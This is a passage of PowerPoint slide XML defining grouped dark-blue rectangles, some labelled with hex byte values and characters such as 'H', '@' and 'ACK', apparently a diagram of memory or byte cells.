                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20547F0F-8491-D94E-B766-6ED3E91C275C}"/>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9" name="Rectangle 168">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B469E899-55D1-3843-9F38-449BE38931E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0" name="Rectangle 169">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3887F0B-CC49-5B41-A96F-932F05295EB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1" name="Rectangle 170">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A216BBF-9D8B-7C46-B71D-569D91439F25}"/>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2" name="Rectangle 171">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A522567A-FC73-1945-B7FC-2BC5EA1F76AE}"/>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3" name="Rectangle 172">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C2CD819-9F61-F342-8CCD-4B2092451409}"/>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4" name="Rectangle 173">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93B86213-339B-014A-A201-38CBFCABB29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5" name="Rectangle 174">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D5D8B36-05A6-8745-AACA-43A0C819B9DF}"/>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41" name="Group 140">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1A7CFCB-378B-244F-92BB-A23DD5441EE4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="686819" y="4335234"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="160" name="Rectangle 159">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{271B7355-D631-D640-9515-C93C2FE929E1}"/>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1" name="Rectangle 160">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75AE73D3-BBEF-E149-A424-B5B1B08BF3B3}"/>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2" name="Rectangle 161">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1C3A5F4-288A-DD4F-9E72-F87FBD2C88E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3" name="Rectangle 162">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0438AC92-FE86-F945-AC24-FCA15EB01A0E}"/>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4" name="Rectangle 163">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D717961-B649-FE4A-B4D4-F378426D936E}"/>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5" name="Rectangle 164">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A36878D-424E-0044-9191-33F1CA182550}"/>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6" name="Rectangle 165">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B91BC67E-3739-B74E-A7DF-C3F489A9154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7" name="Rectangle 166">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2011E179-5B00-4343-A6D4-78EA9E8143B9}"/>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nvGrpSpPr>
            <p:cNvPr id="142" name="Group 141">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF1B598B-6852-0542-AEFD-2E284B358132}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="686819" y="3539123"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="152" name="Rectangle 151">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1E77F7A-0BBE-914E-9F0C-161E317B9429}"/>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3" name="Rectangle 152">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06F2F73E-EBEA-8D45-9A06-411F13B296B6}"/>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4" name="Rectangle 153">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2164AF71-4BA6-0B47-87F8-7A7BA40D7A48}"/>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5" name="Rectangle 154">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57C60C54-10A6-574D-9E02-9B9DF261EC10}"/>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6" name="Rectangle 155">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05A71C11-2A00-D24F-B86C-D5812E94DEF1}"/>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7" name="Rectangle 156">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{894FD6D3-FF03-7045-BF1D-76485925D2A6}"/>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158" name="Rectangle 157">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EF55345-1776-B645-8D88-C7AF154D868D}"/>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159" name="Rectangle 158">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB61455A-8E63-5F4A-ACEE-0CCE8749534D}"/>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nvGrpSpPr>
            <p:cNvPr id="143" name="Group 142">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB276049-8133-6448-A34A-ED699EC61AAC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="686819" y="2753696"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="144" name="Rectangle 143">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB652165-EDA0-ED40-80BC-16FE2D698A5B}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="920884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5" name="Rectangle 144">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13D4E2F0-1030-4049-88FB-4338F1F08DA0}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="945061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6" name="Rectangle 145">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32422BC4-B505-3F46-9CCE-1A0288EB87BD}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="969238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7" name="Rectangle 146">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B81D6E3F-5C63-AC44-9890-91A5B734F596}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9934159"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8" name="Rectangle 147">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B281951-06F1-8444-8236-98B3E650DA73}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10179379" y="3986005"/>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9" name="Rectangle 148">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{043FA423-674D-A541-93AF-3EAD8871BD0F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1042149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0" name="Rectangle 149">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15EE8274-0DB9-BE4C-91E7-6FE1CB886A80}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1066671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1" name="Rectangle 150">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46BAA690-30C7-DD44-8890-C188B61AF34A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10903803"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7F5F986-0C40-4A4E-8C69-75165267B0C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="703315" y="2762324"/>
            <a:ext cx="4830980" cy="3967780"/>
            <a:chOff x="686819" y="2753696"/>
            <a:chExt cx="4830980" cy="3967780"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="91" name="Group 90">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BCD9C3E-3B1D-F24E-B15E-A13E5DB46D38}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="686819" y="5129253"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="119" name="Rectangle 118">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8798719-58B1-8047-8AFC-720102AC436F}"/>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120" name="Rectangle 119">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B9999F4-C43F-8C43-A612-F8E268EF7455}"/>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121" name="Rectangle 120">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{501549A8-A912-E14F-AA6C-B65B19C8977F}"/>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C3</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFFF00"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>???</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="122" name="Rectangle 121">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2856C57E-901E-8F49-A3DA-DD549F9091D3}"/>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123" name="Rectangle 122">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6440F587-5219-134B-9CB8-3C88B7286D1D}"/>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40</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFFF00"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'@'</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="124" name="Rectangle 123">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18AD5693-8410-604D-9AA9-3E78E62D5184}"/>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06</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFFF00"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>ACK</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="125" name="Rectangle 124">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02FDB8B8-E300-904D-8DCE-60E404AFAD7C}"/>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48</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFFF00"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'H'</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="126" name="Rectangle 125">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE810DD0-3596-BD4E-9657-219F3636EBDB}"/>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grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="92" name="Group 91">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A97AF6B-F575-1E49-BBB8-E941D62038D4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="686819" y="5927470"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="111" name="Rectangle 110">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67787237-3456-3742-8C8C-851AEE8B0105}"/>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2" name="Rectangle 111">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB2FB27C-8327-6C43-BE9C-FADF80C7614A}"/>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3" name="Rectangle 112">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90BFF62C-C063-5C4A-9ACC-15A24478B986}"/>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4" name="Rectangle 113">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D01DEE41-2798-6D41-9783-B5AB8B7F9ACA}"/>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5" name="Rectangle 114">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24982B7E-060D-B545-9C7B-8682A8F9772F}"/>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6" name="Rectangle 115">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B207072B-186E-2844-A40A-7C174A2ECACA}"/>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7" name="Rectangle 116">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CF6B51A-D9EB-EB47-B3F7-2ECFC0F4892F}"/>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8" name="Rectangle 117">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC6E6786-9D11-0F4C-8550-74EF2D1E4E27}"/>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93" name="Group 92">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BB48FA2-1A3D-BF47-8BFF-16757EDA3401}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="686819" y="4335234"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="103" name="Rectangle 102">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87493E35-F098-FA4C-ADE4-55721E9751AF}"/>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4" name="Rectangle 103">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{612B89F9-8637-B34C-B1C8-2788E17E3A1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5" name="Rectangle 104">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{698DF609-3A75-E149-90C4-CF9FDFDB98D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6" name="Rectangle 105">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9EAB29D-A9C5-764B-ADED-A4D3E53108E1}"/>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7" name="Rectangle 106">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9B344E5-DE3A-3346-895E-B729214A3413}"/>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8" name="Rectangle 107">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6468A93C-84DE-724D-A0A1-93BB5FDAD671}"/>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9" name="Rectangle 108">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D1236B5-74E9-AF42-8E61-77EE1778B48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10" name="Rectangle 109">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9446E804-B359-2843-B217-A8F1CD438CDC}"/>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nvGrpSpPr>
            <p:cNvPr id="94" name="Group 93">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32264CEE-70E5-D84C-BF5E-B23B8D0F9CAA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="686819" y="3539123"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="95" name="Rectangle 94">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCF20F41-91BA-2947-B56D-6A46B5D16FAB}"/>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96" name="Rectangle 95">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00707807-029E-1142-83EA-90D2E46371BF}"/>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97" name="Rectangle 96">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C3EB180-E80B-7B4A-BF13-DBFB2CBF314E}"/>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7F</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="98" name="Rectangle 97">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82CEC1EE-62F7-354E-B505-1A4F6E6F2485}"/>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FF</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="99" name="Rectangle 98">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F46D6564-D665-BD4D-8D5D-5B476B82D75E}"/>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FF</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="100" name="Rectangle 99">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28F613D0-1B37-FD48-88C5-4689C242C71C}"/>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FF</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="101" name="Rectangle 100">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23CD540F-DD0E-9146-B874-B578A53BE7C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DF</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="102" name="Rectangle 101">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9380E695-41BD-914F-96AC-648FACEAC857}"/>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F8</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="89" name="Group 88">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22EEFC9E-9143-5248-A4BC-BEC7BA201093}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="686819" y="2753696"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="127" name="Rectangle 126">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C7A395C-BBCA-1648-BE89-CCC92A9C1BE6}"/>
                  </a:ext>
